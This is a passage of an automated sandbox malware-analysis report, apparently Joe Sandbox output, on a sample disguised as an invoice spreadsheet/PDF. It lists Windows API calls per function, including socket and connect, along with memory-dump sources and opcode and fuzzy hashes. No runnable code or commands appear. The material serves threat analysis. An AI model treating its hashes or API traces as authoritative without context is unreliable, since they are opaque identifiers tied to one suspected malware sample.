                                                                              • Instruction Fuzzy Hash: 1321E0712006409BCB10EF29D994D6B73A8EF45321B40466EFE5597382DB34EC08CBA9
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 00445721
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0044573C
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00445773
                                                                              • _wcslen.LIBCMT ref: 004457A3
                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 004457AD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                              • String ID:
                                                                              • API String ID: 3087257052-0
                                                                              • Opcode ID: d9613d333599a081e7b9d4473579ad420cc88c3ed5905a3a7ac9e2a5604fb33b
                                                                              • Instruction ID: 00e09c3d40749c53521e9302b0eb92bb7bfe2d7d521d01ead8474e6f611d5aec
                                                                              • Opcode Fuzzy Hash: d9613d333599a081e7b9d4473579ad420cc88c3ed5905a3a7ac9e2a5604fb33b
                                                                              • Instruction Fuzzy Hash: FA11E972601741BBF7105B35DC46F5B77CDAF65320F04443AF40AE6281FB69E84583AA
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 00459DEF
                                                                              • GetForegroundWindow.USER32 ref: 00459E07
                                                                              • GetDC.USER32(00000000), ref: 00459E44
                                                                              • GetPixel.GDI32(00000000,?,00000000), ref: 00459E4F
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 00459E8B
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Window$ForegroundPixelRelease
                                                                              • String ID:
                                                                              • API String ID: 4156661090-0
                                                                              • Opcode ID: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                              • Instruction ID: f25aa70a507d7fb142791e963b89e5313ab4350e7ab13503248c443e15a863bf
                                                                              • Opcode Fuzzy Hash: c25ec76bf159445cc401153d518622b926736981535c7bd42fe0b2b106eefd61
                                                                              • Instruction Fuzzy Hash: 76219D76600202ABD700EFA5CD49A5AB7E9FF84315F19483DF90597642DB78FC04CBA9
                                                                              APIs
                                                                                • Part of subcall function 004647A2: inet_addr.WSOCK32(?), ref: 004647C7
                                                                              • socket.WSOCK32(00000002,00000001,00000006), ref: 00464985
                                                                              • WSAGetLastError.WSOCK32(00000000,00000002,00000001,00000006,00000000), ref: 00464993
                                                                              • connect.WSOCK32(00000000,00000000,00000010), ref: 004649CD
                                                                              • WSAGetLastError.WSOCK32(00000000,00000000,00000000,00000010,00000002,00000001,00000006,00000000), ref: 004649F4
                                                                              • closesocket.WSOCK32(00000000), ref: 00464A07
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                              • String ID:
                                                                              • API String ID: 245547762-0
                                                                              • Opcode ID: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                              • Instruction ID: b27d5ee258410aac5bd3077dd9c53ce90635b59006b610d0ec7ee295a05cd03d
                                                                              • Opcode Fuzzy Hash: aaa03f654d2c2080970664bbc2635e6406c59b0d093f7dcd590a1c65d79e0220
                                                                              • Instruction Fuzzy Hash: 3211DA712002109BD310FB2AC842F9BB3D8AF85728F04895FF594A72D2D7B9A885875A
                                                                              APIs
                                                                              • DeleteObject.GDI32(00000000), ref: 00447151
                                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                              • SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                              • BeginPath.GDI32(?), ref: 004471B7
                                                                              • SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Object$Select$BeginCreateDeletePath
                                                                              • String ID:
                                                                              • API String ID: 2338827641-0
                                                                              • Opcode ID: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                              • Instruction ID: ab30216038401830d00444c504d41f25dcbf82a6e2307e0a418987ed8484b610
                                                                              • Opcode Fuzzy Hash: f19e52de08adcd67550c2e9faff4417be3cdd69e9125f029607893bae639c511
                                                                              • Instruction Fuzzy Hash: 7E2171B18083019FD320CF29AD44A1B7FACF74A724F14052FF654933A1EB789849CB69
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043771E
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043773C
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,004448B6,0000000F,?), ref: 0043775C
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,004448B6,0000000F,?), ref: 00437767
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CounterPerformanceQuerySleep
                                                                              • String ID:
                                                                              • API String ID: 2875609808-0
                                                                              • Opcode ID: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                              • Instruction ID: fd8a8a83491f03de43ea78fbc63302b75a2fa5438857304713168bbc83ca9150
                                                                              • Opcode Fuzzy Hash: 901ea73111326f2a8af3d8a1217edfde6b6dff748f8bb26d3b0ac17b2ce0a9c5
                                                                              • Instruction Fuzzy Hash: EA11A3B64093119BC210EF1ADA88A8FB7F4FFD8765F004D2EF9C462250DB34D5598B9A
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 0046FD00
                                                                              • SendMessageW.USER32(?,0000104C,00000000,?), ref: 0046FD2E
                                                                              • SendMessageW.USER32(?,00001015,?,?), ref: 0046FD4B
                                                                              • DestroyIcon.USER32(?), ref: 0046FD58
                                                                              • DestroyIcon.USER32(?), ref: 0046FD5F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyIcon
                                                                              • String ID:
                                                                              • API String ID: 3419509030-0
                                                                              • Opcode ID: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                              • Instruction ID: ba7c1cc62690e465ab1dcb48fa3e0f79152c3dc78d34179caeeeb49ed344ab69
                                                                              • Opcode Fuzzy Hash: a24bc400bf7eaff3d1708451a80103ed5292b50ec6011cebb58ec712c1110a53
                                                                              • Instruction Fuzzy Hash: 5F1182B15043449BE730DF14DC46BABB7E8FBC5714F00492EE6C857291D6B8A84A8B67
                                                                              APIs
                                                                              • __getptd.LIBCMT ref: 004175AE
                                                                                • Part of subcall function 00416C72: __getptd_noexit.LIBCMT ref: 00416C75
                                                                                • Part of subcall function 00416C72: __amsg_exit.LIBCMT ref: 00416C82
                                                                              • __amsg_exit.LIBCMT ref: 004175CE
                                                                              • __lock.LIBCMT ref: 004175DE
                                                                              • InterlockedDecrement.KERNEL32(?), ref: 004175FB
                                                                              • InterlockedIncrement.KERNEL32(02FD2D48), ref: 00417626
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                                                              • String ID:
                                                                              • API String ID: 4271482742-0
                                                                              • Opcode ID: cef6af0c730a10c674891530ba4a9f92a8997b3b581fa775581189220e01fce3
                                                                              • Instruction ID: de548182bd5f57d4f8c9f8a4c79293bfa6802d75d0085d2526eaa3c6a777046b
                                                                              • Opcode Fuzzy Hash: cef6af0c730a10c674891530ba4a9f92a8997b3b581fa775581189220e01fce3
                                                                              • Instruction Fuzzy Hash: 9401AD31944A11AFC710ABA998497CE7BB0BB11724F0540ABE80063791CB3CA9C1CFEE
                                                                              APIs
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$Icon
                                                                              • String ID:
                                                                              • API String ID: 4023252218-0
                                                                              • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                              • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                              • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                              • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                              • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                              • MessageBeep.USER32(00000000), ref: 0046036D
                                                                              • KillTimer.USER32(?,0000040A), ref: 00460392
                                                                              • EndDialog.USER32(?,00000001), ref: 004603AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                              • String ID:
                                                                              • API String ID: 3741023627-0
                                                                              • Opcode ID: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                              • Instruction ID: 48c257e0c270193328064fa19c5b46d6a870d8092b70dfec968bdaebd9a60f08
                                                                              • Opcode Fuzzy Hash: 5e0545b8da8baa7cb8324f4116d33f6edaa60507eab9176a587cebaf75a8c25b
                                                                              • Instruction Fuzzy Hash: BE018831500300A7E7209B54DE5DBDB77A8BF44B05F00492EB681A25D0E7F8A584CB55
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                              • String ID:
                                                                              • API String ID: 1489400265-0
                                                                              • Opcode ID: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                              • Instruction ID: 68d82c845863845e83b9d92669df32d5d1b96a6c2c0272d07869f65424c05900
                                                                              • Opcode Fuzzy Hash: fb8346e1cf28bbdc4ad062342734fe1bacbf25b41774fd01ae6266dc65fad9d1
                                                                              • Instruction Fuzzy Hash: D9014F703006419BDB10EF65DED8A2A73A9FB44712B40455AFE05DB286DB78EC49CB68
                                                                              APIs
                                                                                • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                              • String ID:
                                                                              • API String ID: 1042038666-0
                                                                              • Opcode ID: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                              • Instruction ID: 707d1f3050e1f0ff98422ce5efa9f9a4d3559fdafbc0a23101ed238e91bf2869
                                                                              • Opcode Fuzzy Hash: 920ee65d6839c6288c76afce6441748d32e1b72318fe83d584ccefe2da360159
                                                                              • Instruction Fuzzy Hash: B2014B702006419BCB10AF65D9C8A2A33ACAF19322780456AFD05D7242DB28EC498B79
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                              • String ID:
                                                                              • API String ID: 2625713937-0
                                                                              • Opcode ID: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                              • Instruction ID: 1b0d13c7bbaa275692c81ef4a4760df4fcf6218f807946f7e03cce85d1463269
                                                                              • Opcode Fuzzy Hash: a89ec47609df172868659220a46891f09f78d761c189f4b7bb4a315096e7830c
                                                                              • Instruction Fuzzy Hash: F7F0A4751052019BD7508F18EC0C70E7FA8FB4F325F04462EEA19932E0DB781546CBAD
                                                                              APIs
                                                                                • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                              • ___set_flsgetvalue.LIBCMT ref: 004140E1
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 004140EC
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004140FF
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
                                                                              • ExitThread.KERNEL32 ref: 0041410F
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00414115
                                                                              • __freefls@4.LIBCMT ref: 00414135
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                              • String ID:
                                                                              • API String ID: 132634196-0
                                                                              • Opcode ID: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                              • Instruction ID: c6f54ac6c47f72d6c6be617d0ab0d95393642b3a08ca47198428750b18cc63fb
                                                                              • Opcode Fuzzy Hash: dbe0df41a3d89f03eebcd77cedb8c7fbd95cde8327ee68e759feca9a6a87dff2
                                                                              • Instruction Fuzzy Hash: EFE0B6318012096B8F0177F28E2A8DF3A2DAD56799B12842EBF10A3112DA6DD9D147AD
                                                                              APIs
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
                                                                                • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
                                                                              • __getptd_noexit.LIBCMT ref: 00415620
                                                                              • CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
                                                                              • __freeptd.LIBCMT ref: 0041563B
                                                                              • ExitThread.KERNEL32 ref: 00415643
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 3798957060-0
                                                                              • Opcode ID: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                              • Instruction ID: 5ad9b57b40d8b41da6f03c32f2a15b2799e0bbfe2e5ad1689210a27a588f1b2a
                                                                              • Opcode Fuzzy Hash: d3b08fe511e09ca6ea2d918a54b62a74066439bca0a0e456eaad9824bd7e2a02
                                                                              • Instruction Fuzzy Hash: 29E01A31501A1197C2212BB9AC097DE3255AF01F36F944A6EF81A952A0DB6CD98147AD
                                                                              APIs
                                                                                • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
                                                                              • ___set_flsgetvalue.LIBCMT ref: 00415690
                                                                                • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
                                                                                • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
                                                                                • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
                                                                              • ___fls_getvalue@4.LIBCMT ref: 0041569B
                                                                                • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
                                                                              • ___fls_setvalue@8.LIBCMT ref: 004156AD
                                                                                • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
                                                                              • ExitThread.KERNEL32 ref: 004156BD
                                                                              • __freefls@4.LIBCMT ref: 004156D9
                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2041538979.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.2041490917.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041578137.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041591644.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2041644712.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Outstanding Invoices Spreadsheet Scan 00495_PDF.jbxd
                                                                              Similarity
                                                                              • API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                              • String ID:
                                                                              • API String ID: 1537469427-0
                                                                              • Opcode ID: 99715b5f8e2ff19c7b8f3a2e2e0a417857e73ed83bc070766e6b29f9400adc7a
